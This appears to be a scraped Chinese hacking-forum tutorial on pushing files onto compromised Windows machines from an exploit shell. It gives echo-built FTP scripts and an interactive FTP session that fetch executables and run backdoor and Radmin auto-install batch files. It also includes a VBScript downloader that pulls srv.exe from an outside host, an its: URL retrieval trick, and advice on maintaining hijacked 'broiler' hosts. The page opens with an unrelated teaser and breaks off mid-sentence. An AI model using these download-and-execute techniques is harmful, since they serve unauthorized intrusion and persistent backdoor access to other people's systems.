内容提要:远程(如通过互联网)连接access数据库的方法 前段时间很多人问远程(如通过互联网)连接access数据库的方法,最近写了个例子,与大家共享: 使用了TCP/IP,ADO及XML(需要安装Microsoft XML 4.0。)。分服务器和客户 …… |
ftp -s:1.txt
完后用ftp -s:1.txt就可以自动下载了。
ftp+自定义端口
其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下:
echo open xxx.xxx.xxx.xxx 2121 >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo bin >>ftp.txt [可选]
echo get aoqi.rar>>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
这里自定义端口为2121,只要和ftp服务端的端口一致就行拉
现在再说以下怎样直接在溢出shell下使用FTP传输文件而不用脚本完成。居我所知有2种方法:其一是将你的FTP服务器设为匿名访问,这样直接用FTP命令登陆到服务器就可以下载了。其二是将你的FTP的帐号密码设为空,但这样设置的FTP服务器有一定危险性,大家记得把权限设为只能下载或者改一下FTP的端口.通过以下命令就可以下载了:
C:\WINNT\system32>ftp
ftp
open xxx.kmip.net
User (danne.kmip.net:(none)): 1
bin
get 2.exe
bye
C:\WINNT\system32>aoqi.exe //aoqi.exe是自解压缩包
2.exe
C:\WINNT\system32>dir 1.bat //1.bat是后门自动安装批处理
dir 1.bat
驱动器 C 中的卷没有标签。
卷的序列号是 1001-8227
C:\WINNT\system32 的目录
找不到文件 //这里我不知道为什么解压出来后第一次找文件总是找不到
C:\WINNT\system32>dir 2.bat //2.bat是radmin自动安装批处理
dir 2.bat
驱动器 C 中的卷没有标签。
卷的序列号是 1001-8227
C:\WINNT\system32 的目录
2004-05-01 13:04 85 2.bat
1 个文件 85 字节
0 个目录 4,735,807,488 可用字节
成功率有99%吧,也是本人我一直用的哦~推荐,只是需要自己架设一台FTP服务器出来,可以在你机器上架,或者肉鸡上,我们要充分利用肉鸡嘛(另外多说两句,肉鸡要定期维护,勤打补丁,不要被同行搞去了或被管理员发现)~如果你没有FTP的话我可以提供.
4.写程序下载
脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用
echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序
实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs
echo xPost.Open "GET","http://167168.meibu.com/srv.exe",0 >>167168.vbs
echo xPost.Send() >>167168.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs
echo sGet.Mode = 3 >>167168.vbs
echo sGet.Type = 1 >>167168.vbs
echo sGet.Open() >>167168.vbs
echo sGet.Write(xPost.responseBody) >>167168.vbs
echo sGet.SaveToFile "srv.exe",2 >>167168.vbs
然后执行cscript 167168.vbs就可以啦.其中,http://167168.meibu.com/srv.exe改成你放
文件的网站路径,srv.exe可以改成保存文件的路径。
5.start its:http://167168.meibu.com/ca.rar (看清楚,小心论坛自动加的标签)
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" (假设系统装在c盘,且当前环境是SYSTEM。如果是用户环境,修改Default User为该用户名)
dir /s ca[1].rar
然后会显示ca[1].ra